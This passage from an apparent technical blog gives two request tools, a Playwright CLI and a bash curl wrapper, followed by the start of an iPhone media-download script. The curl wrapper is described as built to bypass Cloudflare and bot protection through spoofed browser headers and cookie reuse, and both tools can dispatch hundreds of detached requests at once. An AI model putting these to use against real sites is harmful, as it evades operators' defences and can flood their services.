}
await performRequest(opts);
}
main().catch(err => {
console.error(`${RED}[FATAL] ${err?.stack || err}${NC}`);
process.exit(1);
});
EOF
chmod +x browser_playwright.mjs

Optionally, move it into your PATH:

sudo mv browser_playwright.mjs /usr/local/bin/browser_playwright

Quick start

  • Simple GET:
node browser_playwright.mjs https://example.com
  • Async GET (returns immediately):
node browser_playwright.mjs --async https://example.com
  • Fire 100 async requests in one command:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get

  • POST JSON:
node browser_playwright.mjs -X POST --json \
-d '{"username":"user","password":"pass"}' \
https://httpbin.org/post
  • POST form data:
node browser_playwright.mjs -X POST --form \
-d "username=user&password=pass" \
https://httpbin.org/post
  • Include response headers:
node browser_playwright.mjs --show-headers https://example.com
  • Save response to a file:
node browser_playwright.mjs -o response.json https://httpbin.org/json
  • Custom headers:
node browser_playwright.mjs \
-H "X-API-Key: your-key" \
-H "Authorization: Bearer token" \
https://httpbin.org/headers
  • Persistent cookies across requests:
COOKIE_FILE="playwright_session.json"
# Login and save cookies
node browser_playwright.mjs -c "$COOKIE_FILE" \
-X POST --form \
-d "user=test&pass=secret" \
https://httpbin.org/post > /dev/null
# Authenticated-like follow-up (cookie file reused)
node browser_playwright.mjs -c "$COOKIE_FILE" \
https://httpbin.org/cookies

Load testing patterns

  • Simple load test with --count:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get
  • Loop-based alternative:
for i in {1..100}; do
node browser_playwright.mjs --async https://httpbin.org/get
done
  • Timed load test:
cat > pw_load_for_duration.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
DURATION="${2:-60}"
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
node browser_playwright.mjs --async "$URL" >/dev/null 2>&1
((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"
EOF
chmod +x pw_load_for_duration.sh
./pw_load_for_duration.sh https://httpbin.org/get 30
  • Parameterized load test:
cat > pw_load_test.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
node browser_playwright.mjs --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"
EOF
chmod +x pw_load_test.sh
./pw_load_test.sh https://httpbin.org/get 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE/PATCH)
  • -d, --data Request body
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response body to file
  • -c, --cookie Cookie file to use (and persist)
  • -A, --user-agent Override User-Agent
  • -t, --timeout Max request time in seconds (default 30)
  • --async Run request(s) in the background
  • --count N Fire N async requests (requires --async)
  • --no-redirect Best-effort disable following redirects
  • --show-headers Include response headers before body
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

  • Real Chromium network stack (HTTP/2, TLS, compression)
  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
-X POST --form \
-d "user=user&pass=pass" \
"$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
"$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
--async --count 20 \
"$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
"https://example.com/"
"https://example.com/"
"https://example.com/"
)
for url in "${URLS[@]}"; do
echo "Fetching: $url"
node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
echo "$(date): Service healthy"
else
echo "$(date): Service unhealthy"
fi
sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

Troubleshooting

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal GET/headers/redirect/cookie-capable script. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client; Selenium focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys, time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
RED='\033[31m'; GRN='\033[32m'; YLW='\033[33m'; NC='\033[0m'
def parse_args():
    p = argparse.ArgumentParser(description='Minimal Selenium GET client')
    p.add_argument('url')
    p.add_argument('-o', '--output')
    p.add_argument('-c', '--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
    p.add_argument('--show-headers', action='store_true')
    p.add_argument('-t', '--timeout', type=int, default=30)
    p.add_argument('-A', '--user-agent')
    p.add_argument('-v', '--verbose', action='store_true')
    return p.parse_args()

args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
    opts.add_argument(f'--user-agent={args.user_agent}')

with webdriver.Chrome(options=opts) as driver:
    driver.set_page_load_timeout(args.timeout)
    # Load cookies if present (domain-specific; best-effort)
    if os.path.exists(args.cookie):
        try:
            ck = json.load(open(args.cookie))
            for c in ck.get('cookies', []):
                try:
                    driver.get('https://' + c.get('domain').lstrip('.'))
                    driver.add_cookie({
                        'name': c['name'], 'value': c['value'], 'path': c.get('path', '/'),
                        'domain': c.get('domain'), 'secure': c.get('secure', False)
                    })
                except Exception:
                    pass
        except Exception:
            pass
    driver.get(args.url)
    # Persist cookies (best-effort)
    try:
        cookies = driver.get_cookies()
        json.dump({'cookies': cookies}, open(args.cookie, 'w'), indent=2)
    except Exception:
        pass
    if args.output:
        open(args.output, 'w').write(driver.page_source)
    else:
        sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.

Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash
# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false
# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
usage() {
cat << EOH
Usage: $(basename "$0") [OPTIONS] URL
Advanced curl wrapper that mimics browser behavior to bypass bot protection.
OPTIONS:
-X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
-d, --data DATA           POST/PUT data
-H, --header HEADER       Add custom header (can be used multiple times)
-o, --output FILE         Write output to file
-c, --cookie FILE         Use custom cookie file [default: temp file]
-A, --user-agent UA       Custom user agent [default: Chrome on macOS]
-t, --timeout SECONDS     Request timeout [default: 30]
--async                   Run request asynchronously in background
--count N                 Number of async requests to fire [default: 1, requires --async]
--no-redirect             Don't follow redirects
--show-headers            Show response headers
--json                    Send data as JSON (sets Content-Type)
--form                    Send data as form-urlencoded
-v, --verbose             Verbose output
-h, --help                Show this help message
EXAMPLES:
# Simple GET request
$(basename "$0") https://example.com
# Async GET request
$(basename "$0") --async https://example.com
# POST with JSON data
$(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login
# POST with form data
$(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login
# Multiple async requests (using loop)
for i in {1..10}; do
$(basename "$0") --async https://example.com/api/endpoint
done
# Multiple async requests (using --count)
$(basename "$0") --async --count 10 https://example.com/api/endpoint
EOH
exit 0
}
# Parse arguments
EXTRA_HEADERS=()
URL=""
while [[ $# -gt 0 ]]; do
case $1 in
-X|--method)
METHOD="$2"
shift 2
;;
-d|--data)
DATA="$2"
shift 2
;;
-H|--header)
EXTRA_HEADERS+=("$2")
shift 2
;;
-o|--output)
OUTPUT_FILE="$2"
shift 2
;;
-c|--cookie)
COOKIE_FILE="$2"
shift 2
;;
-A|--user-agent)
USER_AGENT="$2"
shift 2
;;
-t|--timeout)
TIMEOUT="$2"
shift 2
;;
--async)
ASYNC=true
shift
;;
--count)
COUNT="$2"
shift 2
;;
--no-redirect)
FOLLOW_REDIRECTS=false
shift
;;
--show-headers)
SHOW_HEADERS=true
shift
;;
--json)
CONTENT_TYPE="application/json"
shift
;;
--form)
CONTENT_TYPE="application/x-www-form-urlencoded"
shift
;;
-v|--verbose)
VERBOSE=true
shift
;;
-h|--help)
usage
;;
*)
if [[ -z "$URL" ]]; then
URL="$1"
else
echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
exit 1
fi
shift
;;
esac
done
# Validate URL
if [[ -z "$URL" ]]; then
echo -e "${RED}Error: URL is required${NC}" >&2
usage
fi
# Validate count
if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
echo -e "${RED}Error: --count requires --async${NC}" >&2
exit 1
fi
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
exit 1
fi
# Execute curl
execute_curl() {
# Build curl arguments as array instead of string
local -a curl_args=()
# Basic options
curl_args+=("--compressed")
curl_args+=("--max-time" "$TIMEOUT")
curl_args+=("--connect-timeout" "10")
curl_args+=("--http2")
# Cookies (ensure file exists to avoid curl warning)
touch "$COOKIE_FILE" 2>/dev/null || true
curl_args+=("--cookie" "$COOKIE_FILE")
curl_args+=("--cookie-jar" "$COOKIE_FILE")
# Follow redirects
if [[ "$FOLLOW_REDIRECTS" == true ]]; then
curl_args+=("--location")
fi
# Show headers
if [[ "$SHOW_HEADERS" == true ]]; then
curl_args+=("--include")
fi
# Output file
if [[ -n "$OUTPUT_FILE" ]]; then
curl_args+=("--output" "$OUTPUT_FILE")
fi
# Verbose
if [[ "$VERBOSE" == true ]]; then
curl_args+=("--verbose")
else
curl_args+=("--silent" "--show-error")
fi
# Method
curl_args+=("--request" "$METHOD")
# Browser-like headers
curl_args+=("--header" "User-Agent: $USER_AGENT")
curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
curl_args+=("--header" "Connection: keep-alive")
curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
curl_args+=("--header" "Sec-Fetch-Dest: document")
curl_args+=("--header" "Sec-Fetch-Mode: navigate")
curl_args+=("--header" "Sec-Fetch-Site: none")
curl_args+=("--header" "Sec-Fetch-User: ?1")
curl_args+=("--header" "Cache-Control: max-age=0")
# Content-Type for POST/PUT
if [[ -n "$DATA" ]]; then
if [[ -n "$CONTENT_TYPE" ]]; then
curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
fi
curl_args+=("--data" "$DATA")
fi
# Extra headers
for header in "${EXTRA_HEADERS[@]}"; do
curl_args+=("--header" "$header")
done
# URL
curl_args+=("$URL")
if [[ "$ASYNC" == true ]]; then
# Run asynchronously in background
if [[ "$VERBOSE" == true ]]; then
echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
fi
# Fire multiple requests if count > 1
local pids=()
for ((i=1; i<=COUNT; i++)); do
# Run in background detached, suppress all output
nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
local pid=$!
disown $pid
pids+=("$pid")
done
if [[ "$COUNT" -eq 1 ]]; then
echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
else
echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
fi
else
# Run synchronously
if [[ "$VERBOSE" == true ]]; then
echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
fi
curl "${curl_args[@]}"
local exit_code=$?
if [[ $exit_code -ne 0 ]]; then
echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
return $exit_code
fi
fi
}
# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
rm -f "$COOKIE_FILE"
fi
}
# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
trap cleanup EXIT
fi
# Main execution
execute_curl
# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
-d '{"username":"user","password":"pass"}' \
https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
-d "username=user&password=pass" \
https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
-H "X-API-Key: your-key" \
-H "Authorization: Bearer token" \
https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"
# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
-X POST --form \
-d "user=test&pass=secret" \
https://example.com/login
# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
https://example.com/dashboard

Load testing patterns

Simple load test with --count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
./browser_curl.sh --async "$URL" > /dev/null 2>&1
((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE) [default: GET]
  • -d, --data Request body (JSON or form)
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response to a file [default: stdout]
  • -c, --cookie Cookie file to use (and persist) [default: temp file]
  • -A, --user-agent Override User-Agent [default: Chrome on macOS]
  • -t, --timeout Max request time in seconds [default: 30]
  • --async Run request(s) in the background [default: false]
  • --count N Fire N async requests (requires --async) [default: 1]
  • --no-redirect Don’t follow redirects [default: follows]
  • --show-headers Include response headers [default: false]
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics [default: false]
  • -h, --help Show usage

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior

Cookie jar

  • Maintains session cookies across redirects and calls
  • Persists cookies to a file for reuse
  • The default temp cookie file is created automatically and cleaned up on exit

Redirect handling

  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.

Real-world examples

Example 1: API authentication flow

cd ~/Desktop/warp
bash -c 'cat > test_auth.sh << '\''SCRIPT'\''
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"
echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json -d "{\"username\":\"user\",\"password\":\"pass\"}" "$API_BASE/auth/login" > /dev/null
echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .
echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"
echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh'

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
"https://example.com/page1"
"https://example.com/page2"
"https://example.com/page3"
)
for url in "${URLS[@]}"; do
echo "Fetching: $url"
./browser_curl.sh -o "$(basename "$url").html" "$url"
sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"
while true; do
if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
echo "$(date): Service healthy"
else
echo "$(date): Service unhealthy"
fi
sleep 30
done

Installing browser_curl to your PATH

If you want browser_curl.sh to be available from anywhere, install it on your PATH:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ~/Desktop/warp/browser_curl.sh ~/.local/bin/browser_curl
echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc
echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc
echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com
# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com
# Production mode
./browser_curl.sh https://example.com

Issue: Cookie file warning on first run

Cause: First-time cookie file creation

Solution: The script now pre-creates the cookie file automatically. You can ignore any residual warnings.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches:

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file
  3. Use browser_curl.sh -c cookies.txt for subsequent requests
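A minimal sketch of step 3, assuming a separate Playwright script (not shown here) has already exported its session cookies in Netscape format to cookies.txt; the hostnames are illustrative:

# Reuse the browser-established session for fast follow-up requests
./browser_curl.sh -c cookies.txt "https://protected.example.com/dashboard"
./browser_curl.sh -c cookies.txt --async --count 20 "https://protected.example.com/api/data"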

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

Test                             Time                   Requests/sec
Single sync request              approximately 0.2s
10 async requests (--count)      approximately 0.03s    333/s
100 async requests (--count)     approximately 0.09s    1111/s
1000 async requests (--count)    approximately 0.8s     1250/s

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain
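None of these exist yet, but some can be approximated today by wrapping the script. For example, a rough retry-with-exponential-backoff wrapper (a sketch only, not part of browser_curl.sh):

#!/bin/bash
# retry_curl.sh - retry browser_curl.sh with exponential backoff (illustrative sketch)
MAX_ATTEMPTS=5
DELAY=1
for attempt in $(seq 1 "$MAX_ATTEMPTS"); do
  if ./browser_curl.sh "$@"; then
    exit 0
  fi
  echo "Attempt $attempt failed; retrying in ${DELAY}s..." >&2
  sleep "$DELAY"
  DELAY=$((DELAY * 2))
done
echo "All $MAX_ATTEMPTS attempts failed" >&2
exit 1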

Conclusion

browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.


A Script to download Photos and Videos from your iPhone to your MacBook (by creation date and a file name filter)

Annoyingly, Apple never quite got around to making it easy to offload images from your iPhone to your MacBook. Below is a complete guide to automatically downloading photos and videos from your iPhone to your MacBook, with options to filter by pattern and date and to organize files into folders by creation date.

Prerequisites

Install the required tools using Homebrew:

cat > install_iphone_util.sh << 'EOF'
#!/bin/bash
set -e
echo "Installing tools..."
echo "Installing macFUSE"
brew install --cask macfuse
echo "Adding Brew Tap" 
brew tap gromgit/fuse
echo "Installing ifuse-mac" 
brew install gromgit/fuse/ifuse-mac
echo "Installing libimobiledevice" 
brew install libimobiledevice
echo "Installing exiftool"
brew install exiftool
echo "Done! Tools installed."
EOF
echo "Making executable..."
chmod +x install_iphone_util.sh
./install_iphone_util.sh

Setup/Pair your iPhone to your Macbook

  1. Connect your iPhone to your MacBook via USB
  2. Trust the computer on your iPhone when prompted
  3. Verify the connection:
idevicepair validate

If not paired, run:

idevicepair pair
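Once pairing succeeds, you can sanity-check the connection with a couple of libimobiledevice commands (output will vary by device):

# Print the connected device's name and iOS version
idevicename
ideviceinfo -k ProductVersion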

Download Script

Run the script below to create the file download-iphone-media.sh in your current directory:

#!/bin/bash
cat > download-iphone-media.sh << 'OUTER_EOF'
#!/bin/bash
# iPhone Media Downloader
# Downloads photos and videos from iPhone to MacBook
# Supports resumable, idempotent downloads
set -e
# Default values
PATTERN="*"
OUTPUT_DIR="."
ORGANIZE_BY_DATE=false
START_DATE=""
END_DATE=""
MOUNT_POINT="/tmp/iphone_mount"
STATE_DIR=""
VERIFY_CHECKSUM=true
# Usage function
usage() {
cat << 'INNER_EOF'
Usage: $0 [OPTIONS]
Download photos and videos from iPhone to MacBook.
OPTIONS:
-p PATTERN          File pattern to match (e.g., "*.jpg", "*.mp4", "IMG_*")
Default: * (all files)
-o OUTPUT_DIR       Output directory (default: current directory)
-d                  Organize files by creation date into YYYY/MMM folders
-s START_DATE       Start date filter (YYYY-MM-DD)
-e END_DATE         End date filter (YYYY-MM-DD)
-r                  Resume incomplete downloads (default: true)
-n                  Skip checksum verification (faster, less safe)
-h                  Show this help message
EXAMPLES:
# Download all photos and videos to current directory
$0
# Download only JPG files to ~/Pictures/iPhone
$0 -p "*.jpg" -o ~/Pictures/iPhone
# Download all media organized by date
$0 -d -o ~/Pictures/iPhone
# Download videos from specific date range
$0 -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/iPhone
# Download specific IMG files organized by date
$0 -p "IMG_*.{jpg,heic}" -d -o ~/Photos
INNER_EOF
exit 1
}
# Parse command line arguments
while getopts "p:o:ds:e:rnh" opt; do
case $opt in
p) PATTERN="$OPTARG" ;;
o) OUTPUT_DIR="$OPTARG" ;;
d) ORGANIZE_BY_DATE=true ;;
s) START_DATE="$OPTARG" ;;
e) END_DATE="$OPTARG" ;;
r) ;; # Resume is default, keeping for backward compatibility
n) VERIFY_CHECKSUM=false ;;
h) usage ;;
*) usage ;;
esac
done
# Create output directory if it doesn't exist
mkdir -p "$OUTPUT_DIR"
